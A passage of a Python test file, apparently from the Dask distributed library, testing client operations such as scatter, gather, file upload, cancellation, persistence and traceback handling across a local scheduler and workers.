async def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
np = pytest.importorskip("numpy")
lists = c.map(np.ones, [10000] * 10, pure=False)
sums = c.map(np.sum, lists)
total = c.submit(sum, sums)
def f(x, y):
return None
results = c.map(f, lists, [total] * 10)
await wait([total])
await wait(results)
assert (
sum(
s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
for l, r in zip(lists, results)
)
>= 9
)
@gen_cluster(client=True)
async def test_get_with_non_list_key(c, s, a, b):
dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
x = await c.get(dsk, ("x", 0), sync=False)
y = await c.get(dsk, 5, sync=False)
assert x == 2
assert y == 3
@gen_cluster(client=True)
async def test_get_with_error(c, s, a, b):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
await c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
c.get(dsk, "y")
@gen_cluster(client=True)
async def test_directed_scatter(c, s, a, b):
await c.scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
await c.scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
futures = c.scatter([1, 2, 3], workers=[b["address"]])
has_what = sync(loop, c.scheduler.has_what)
assert len(has_what[b["address"]]) == len(futures)
assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
async def test_scatter_direct(c, s, a, b):
future = await c.scatter(123, direct=True)
assert future.key in a.data or future.key in b.data
assert s.tasks[future.key].who_has
assert future.status == "finished"
result = await future
assert result == 123
assert not s.counters["op"].components[0]["scatter"]
result = await future
assert not s.counters["op"].components[0]["gather"]
result = await c.gather(future)
assert not s.counters["op"].components[0]["gather"]
@gen_cluster()
async def test_scatter_direct_2(s, a, b):
c = await Client(s.address, asynchronous=True, heartbeat_interval=10)
last = s.clients[c.id].last_seen
while s.clients[c.id].last_seen == last:
await asyncio.sleep(0.10)
await c.close()
@gen_cluster(client=True)
async def test_scatter_direct_numpy(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.ones(5)
future = await c.scatter(x, direct=True)
result = await future
assert np.allclose(x, result)
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
async def test_scatter_direct_broadcast(c, s, a, b):
future2 = await c.scatter(456, direct=True, broadcast=True)
assert future2.key in a.data
assert future2.key in b.data
assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
result = await future2
assert result == 456
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_balanced(c, s, *workers):
futures = await c.scatter([1, 2, 3], direct=True)
assert sorted(len(w.data) for w in workers) == [0, 1, 1, 1]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_scatter_direct_broadcast_target(c, s, *workers):
futures = await c.scatter([123, 456], direct=True, workers=workers[0].address)
assert futures[0].key in workers[0].data
assert futures[1].key in workers[0].data
futures = await c.scatter(
[123, 456],
direct=True,
broadcast=True,
workers=[w.address for w in workers[:3]],
)
assert (
f.key in w.data and w.address in s.tasks[f.key].who_has
for f in futures
for w in workers[:3]
)
@gen_cluster(client=True, nthreads=[])
async def test_scatter_direct_empty(c, s):
with pytest.raises((ValueError, TimeoutError)):
await c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 5)
async def test_scatter_direct_spread_evenly(c, s, *workers):
futures = []
for i in range(10):
future = await c.scatter(i, direct=True)
futures.append(future)
assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
results = c.gather(futures, direct=direct)
assert results == [1, 2, 3]
delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
async def test_gather_direct(c, s, a, b):
futures = await c.scatter([1, 2, 3])
data = await c.gather(futures, direct=True)
assert data == [1, 2, 3]
@gen_cluster(client=True)
async def test_many_submits_spread_evenly(c, s, a, b):
L = [c.submit(inc, i) for i in range(10)]
await wait(L)
assert a.data and b.data
@gen_cluster(client=True)
async def test_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
tb = await x.traceback()
assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
async def test_get_traceback(c, s, a, b):
try:
await c.get({"x": (div, 1, 0)}, "x", sync=False)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
@gen_cluster(client=True)
async def test_gather_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await c.gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
def test_traceback_sync(c):
x = c.submit(div, 1, 0)
tb = x.traceback()
assert any(
"x / y" in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
y = c.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb)))
)
z = c.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(client=True)
async def test_upload_file(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", f"def f():\n return {value}") as fn:
await c.upload_file(fn)
x = c.submit(g, pure=False)
result = await x
assert result == value
@gen_cluster(client=True)
async def test_upload_file_refresh_delayed(c, s, a, b):
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", f"def f():\n return {value}") as fn:
await c.upload_file(fn)
sys.path.append(os.path.dirname(fn))
from myfile import f
b = delayed(f)()
bb = c.compute(b, sync=False)
result = await c.gather(bb)
assert result == value
@gen_cluster(client=True)
async def test_upload_file_no_extension(c, s, a, b):
with tmp_text("myfile", "") as fn:
await c.upload_file(fn)
@gen_cluster(client=True)
async def test_upload_file_zip(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
try:
for value in [123, 456]:
with tmp_text(
"myfile.py", f"def f():\n return {value}"
) as fn_my_file:
with zipfile.ZipFile("myfile.zip", "w") as z:
z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
await c.upload_file("myfile.zip")
x = c.submit(g, pure=False)
result = await x
assert result == value
finally:
if os.path.exists("myfile.zip"):
os.remove("myfile.zip")
@gen_cluster(client=True)
async def test_upload_file_egg(c, s, a, b):
def g():
import package_1
import package_2
return package_1.a, package_2.b
# c.upload_file tells each worker to
# - put this file in their local_directory
# - modify their sys.path to include it
# we don't care about the local_directory
# but we do care about restoring the path
with save_sys_modules():
for value in [123, 456]:
with tmpfile() as dirname:
os.mkdir(dirname)
with open(os.path.join(dirname, "setup.py"), "w") as f:
f.write("from setuptools import setup, find_packages\n")
f.write(
'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
value
)
)
# test a package with an underscore in the name
package_1 = os.path.join(dirname, "package_1")
os.mkdir(package_1)
with open(os.path.join(package_1, "__init__.py"), "w") as f:
f.write(f"a = {value}\n")
# test multiple top-level packages
package_2 = os.path.join(dirname, "package_2")
os.mkdir(package_2)
with open(os.path.join(package_2, "__init__.py"), "w") as f:
f.write(f"b = {value}\n")
# compile these into an egg
subprocess.check_call(
[sys.executable, "setup.py", "bdist_egg"], cwd=dirname
)
egg_root = os.path.join(dirname, "dist")
# first file ending with '.egg'
egg_name = [
fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
][0]
egg_path = os.path.join(egg_root, egg_name)
await c.upload_file(egg_path)
os.remove(egg_path)
x = c.submit(g, pure=False)
result = await x
assert result == (value, value)
@gen_cluster(client=True)
async def test_upload_large_file(c, s, a, b):
assert a.local_directory
assert b.local_directory
with tmp_text("myfile", "abc") as fn:
with tmp_text("myfile2", "def") as fn2:
await c._upload_large_file(fn, remote_filename="x")
await c._upload_large_file(fn2)
for w in [a, b]:
assert os.path.exists(os.path.join(w.local_directory, "x"))
assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
with open(os.path.join(w.local_directory, "x")) as f:
assert f.read() == "abc"
with open(os.path.join(w.local_directory, "myfile2")) as f:
assert f.read() == "def"
def test_upload_file_sync(c):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
c.upload_file(fn)
x = c.submit(g)
assert x.result() == 123
@gen_cluster(client=True)
async def test_upload_file_exception(c, s, a, b):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
await c.upload_file(fn)
def test_upload_file_exception_sync(c):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
c.upload_file(fn)
@gen_cluster(client=True, nthreads=[])
async def test_upload_file_new_worker(c, s):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
await c.upload_file(fn)
async with Worker(s.address):
x = await c.submit(g)
assert x == 123
@pytest.mark.skip
@gen_cluster()
async def test_multiple_clients(s, a, b):
a = await Client(s.address, asynchronous=True)
b = await Client(s.address, asynchronous=True)
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.client is a
assert y.client is b
xx = await x
yy = await y
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.client is a
zz = await z
assert zz == 5
await a.close()
await b.close()
@gen_cluster(client=True)
async def test_async_compute(c, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = c.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = await c.gather([yy, zz])
assert result == [2, 0]
assert isinstance(c.compute(y), Future)
assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
async def test_async_compute_with_scatter(c, s, a, b):
d = await c.scatter({("x", 1): 1, ("y", 1): 2})
x, y = d[("x", 1)], d[("y", 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = c.compute(z)
[result] = await c.gather([zz])
assert result == 2 + 3
def test_sync_compute(c):
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = c.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
async def test_remote_scatter_gather(c, s, a, b):
x, y, z = await c.scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(client=True)
async def test_remote_submit_on_Future(c, s, a, b):
x = c.submit(lambda x: x + 1, 1)
y = c.submit(lambda x: x + 1, x)
result = await y
assert result == 3
def test_start_is_idempotent(c):
c.start()
c.start()
c.start()
x = c.submit(inc, 1)
assert x.result() == 2
@gen_cluster(client=True)
async def test_client_with_scheduler(c, s, a, b):
assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y)
result = await x
assert result == 1 + 1
result = await z
assert result == 1 + 1 + 1 + 2
A, B, C = await c.scatter([1, 2, 3])
AA, BB, xx = await c.gather([A, B, x])
assert (AA, BB, xx) == (1, 2, 2)
result = await c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
assert result == 12
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_allow_restrictions(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[a.address]
x = c.submit(inc, 1, workers=a.ip)
await x
assert s.tasks[x.key].who_has == {aws}
assert not s.loose_restrictions
x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
await x
assert s.tasks[x.key].who_has == {aws}
assert x.key in s.loose_restrictions
L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has == {aws} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
await x
assert s.tasks[x.key].who_has
assert x.key in s.loose_restrictions
L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
await wait(L)
assert all(s.tasks[f.key].who_has for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
c.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
c.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
with pytest.raises(TypeError):
c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
def test_bad_address():
with pytest.raises(OSError, match="connect"):
Client("123.123.123.123:1234", timeout=0.1)
with pytest.raises(OSError, match="connect"):
Client("127.0.0.1:1234", timeout=0.1)
def test_informative_error_on_cluster_type():
with pytest.raises(TypeError) as exc_info:
Client(LocalCluster)
assert "Scheduler address must be a string or a Cluster instance" in str(
exc_info.value
)
@gen_cluster(client=True)
async def test_long_error(c, s, a, b):
def bad(x):
raise ValueError("a" * 100000)
x = c.submit(bad, 10)
try:
await x
except ValueError as e:
assert len(str(e)) < 100000
tb = await x.traceback()
assert all(
len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
@gen_cluster(client=True)
async def test_map_on_futures_with_kwargs(c, s, a, b):
def f(x, y=10):
return x + y
futures = c.map(inc, range(10))
futures2 = c.map(f, futures, y=20)
results = await c.gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = c.submit(inc, 100)
future2 = c.submit(f, future, y=200)
result = await future2
assert result == 100 + 1 + 200
class BadlySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject:
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
@gen_cluster(client=True)
async def test_badly_serialized_input(c, s, a, b):
o = BadlySerializedObject()
future = c.submit(inc, o)
futures = c.map(inc, range(10))
L = await c.gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == "error"
with pytest.raises(Exception) as info:
await future
assert "hello!" in str(info.value)
@pytest.mark.skip
@gen_test()
async def test_badly_serialized_input_stderr(capsys, c):
o = BadlySerializedObject()
future = c.submit(inc, o)
while True:
sleep(0.01)
out, err = capsys.readouterr()
if "hello!" in err:
break
assert future.status == "error"
def test_repr(loop):
funcs = [str, repr, lambda x: x._repr_html_()]
with cluster(nworkers=3, worker_kwargs={"memory_limit": "2 GiB"}) as (s, [a, b, c]):
with Client(s["address"], loop=loop) as c:
for func in funcs:
text = func(c)
assert c.scheduler.address in text
assert "threads=3" in text or "Total threads: </strong>" in text
assert "6.00 GiB" in text
if "<table" not in text:
assert len(text) < 80
for func in funcs:
text = func(c)
assert "No scheduler connected" in text
@gen_cluster(client=True)
async def test_repr_async(c, s, a, b):
c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
async def test_repr_no_memory_limit(c, s, a, b):
c._repr_html_()
@gen_test()
async def test_repr_localcluster():
cluster = await LocalCluster(
processes=False, dashboard_address=":0", asynchronous=True
)
client = await Client(cluster, asynchronous=True)
try:
text = client._repr_html_()
assert cluster.scheduler.address in text
assert is_valid_xml(client._repr_html_())
finally:
await client.close()
await cluster.close()
@gen_cluster(client=True)
async def test_forget_simple(c, s, a, b):
x = c.submit(inc, 1, retries=2)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key not in s.tasks
assert z.key not in s.tasks
assert not s.tasks[y.key].dependents
s.client_releases_keys(keys=[y.key], client=c.id)
assert not s.tasks
@gen_cluster(client=True)
async def test_forget_complex(e, s, A, B):
a, b, c, d = await e.scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
await wait([a, b, c, d, ab, ac, cd, acab])
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
assert b.key not in s.tasks
while b.key in A.data or b.key in B.data:
await asyncio.sleep(0.01)
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
async def test_forget_in_flight(e, s, A, B):
delayed2 = partial(delayed, pure=True)
a, b, c, d = (delayed2(slowinc)(i) for i in range(4))
ab = delayed2(slowadd)(a, b, dask_key_name="ab")
cd = delayed2(slowadd)(c, d, dask_key_name="cd")
ac = delayed2(slowadd)(a, c, dask_key_name="ac")
acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")
x, y = e.compute([ac, acab])
s.validate_state()
for i in range(5):
await asyncio.sleep(0.01)
s.validate_state()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate_state()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
@gen_cluster(client=True)
async def test_forget_errors(c, s, a, b):
x = c.submit(div, 1, 0)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=c.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(c):
s = str(c)
r = repr(c)
assert c.scheduler.address in s
assert c.scheduler.address in r
assert str(2) in s # nworkers
assert "cores" in s or "threads" in s
@gen_cluster(client=True)
async def test_waiting_data(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
@gen_cluster()
async def test_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
assert set(s.client_comms) == {c.id, f.id}
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
assert s.wants_what == {
c.id: {x.key, y.key},
f.id: {y.key},
"fire-and-forget": set(),
}
assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}
await c.close()
while c.id in s.wants_what:
await asyncio.sleep(0.01)
assert c.id not in s.wants_what
assert c.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
await f.close()
while s.tasks:
await asyncio.sleep(0.01)
def long_running_client_connection(address):
with pristine_loop():
c = Client(address)
x = c.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
@gen_cluster()
async def test_cleanup_after_broken_client_connection(s, a, b):
proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
proc.daemon = True
proc.start()
while not s.tasks:
await asyncio.sleep(0.01)
proc.terminate()
while s.tasks:
await asyncio.sleep(0.01)
@gen_cluster()
async def test_multi_garbage_collection(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
x.__del__()
while x.key in a.data or x.key in b.data:
await asyncio.sleep(0.01)
assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id, f.id}}
y.__del__()
while x.key in s.wants_what[f.id]:
await asyncio.sleep(0.01)
await asyncio.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id}}
y2.__del__()
while y.key in a.data or y.key in b.data:
await asyncio.sleep(0.01)
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
await c.close()
await f.close()
@gen_cluster(client=True)
async def test__broadcast(c, s, a, b):
x, y = await c.scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test__broadcast_integer(c, s, *workers):
x, y = await c.scatter([1, 2], broadcast=2)
assert len(s.tasks[x.key].who_has) == 2
assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
async def test__broadcast_dict(c, s, a, b):
d = await c.scatter({"x": 1}, broadcast=True)
assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
x, y = c.scatter([1, 2], broadcast=True)
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key},
b["address"]: {x.key, y.key},
}
[z] = c.scatter([3], broadcast=True, workers=[a["address"]])
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key, z.key},
b["address"]: {x.key, y.key},
}
@gen_cluster(client=True)
async def test_proxy(c, s, a, b):
msg = await c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
async def test_cancel(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, x)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
await c.cancel([x])
assert x.cancelled()
assert "cancel" in str(x)
s.validate_state()
while not y.cancelled():
await asyncio.sleep(0.01)
assert not s.tasks
s.validate_state()
@gen_cluster(client=True)
async def test_cancel_tuple_key(c, s, a, b):
x = c.submit(inc, 1, key=("x", 0, 1))
await x
await c.cancel(x)
with pytest.raises(CancelledError):
await x
@gen_cluster()
async def test_cancel_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
await c.cancel([x])
assert x.cancelled()
assert not y.cancelled()
while y.key not in s.tasks:
await asyncio.sleep(0.01)
out = await y
assert out == 2
with pytest.raises(CancelledError):
await x
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_cancel_collection(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await c.cancel(x)
await c.cancel([x])
assert all(f.cancelled() for f in L)
while s.tasks:
await asyncio.sleep(0.01)
def test_cancel_sync(c):
x = c.submit(slowinc, 1, key="x")
y = c.submit(slowinc, x, key="y")
z = c.submit(slowinc, y, key="z")
c.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 30
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(client=True)
async def test_future_type(c, s, a, b):
x = c.submit(inc, 1)
await wait([x])
assert x.type == int
assert "int" in str(x)
@gen_cluster(client=True)
async def test_traceback_clean(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await x
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert "scheduler" not in tb.tb_frame.f_code.co_filename
assert "worker" not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(client=True)
async def test_map_differnet_lengths(c, s, a, b):
assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert dask.base.get_scheduler() == c.get
out, err = capsys.readouterr()
assert len(out.strip().split("\n")) == 1
assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
async def test_async_persist(c, s, a, b):
from dask.delayed import Delayed, delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = c.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y.__dask_keys__() == yy.__dask_keys__()
assert w.__dask_keys__() == ww.__dask_keys__()
while y.key not in s.tasks and w.key not in s.tasks:
await asyncio.sleep(0.01)
assert s.who_wants[y.key] == {c.id}
assert s.who_wants[w.key] == {c.id}
yyf, wwf = c.compute([yy, ww])
yyy, www = await c.gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
assert isinstance(c.persist(y), Delayed)
assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
async def test__persist(c, s, a, b):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
g, h = c.compute([y, yy])
gg, hh = await c.gather([g, h])
assert (gg == hh).all()
def test_persist(c):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
zz = yy.compute()
z = y.compute()
assert (zz == z).all()
@gen_cluster(timeout=60, client=True)
async def test_long_traceback(c, s, a, b):
from distributed.protocol.pickle import dumps
def deep(n):
if n == 0:
1 / 0
else:
return deep(n - 1)
x = c.submit(deep, 200)
await wait([x])
assert len(dumps(c.futures[x.key].traceback)) < 10000
assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
async def test_wait_on_collections(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
async def test_futures_of_get(c, s, a, b):
x, y, z = c.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
assert set(futures_of({"x": x, "y": [y]})) == {x, y}
b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
assert set(futures_of(b)) == {x, y, z}
sg = SubgraphCallable(
{"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
"out",
("in",),
)
assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
da = pytest.importorskip("dask.array")
assert futures_of([da.Array]) == []
@gen_cluster(client=True)
async def test_futures_of_cancelled_raises(c, s, a, b):
x = c.submit(inc, 1)
await c.cancel([x])
with pytest.raises(CancelledError):
await x
with pytest.raises(CancelledError):
await c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)
with pytest.raises(CancelledError):
c.submit(inc, x)
with pytest.raises(CancelledError):
c.submit(add, 1, y=x)
with pytest.raises(CancelledError):
c.map(add, [1], y=x)
assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_dont_delete_recomputed_results(c, s, w):
x = c.submit(inc, 1) # compute first time
await wait([x])
x.__del__() # trigger garbage collection
await asyncio.sleep(0)
xx = c.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
await asyncio.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
await asyncio.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
async def test_fatally_serialized_input(c, s):
o = FatallySerializedObject()
future = c.submit(inc, o)
while not s.tasks:
await asyncio.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
async def test_balance_tasks_by_stacks(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
y = c.submit(inc, 2)
await wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
async def test_run(c, s, a, b):
results = await c.run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = await c.run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(inc, 1, workers=[])
assert results == {}
@gen_cluster(client=True)
async def test_run_handles_picklable_data(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
def func():
return {}, set(), [], (), 1, "hello", b"100"
results = await c.run_on_scheduler(func)
assert results == func()
results = await c.run(func)
assert results == {w.address: func() for w in [a, b]}
def test_run_sync(c, s, a, b):
def func(x, y=10):
return x + y
result = c.run(func, 1, y=2)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(func, 1, y=2, workers=[a["address"]])
assert result == {a["address"]: 3}
@gen_cluster(client=True)
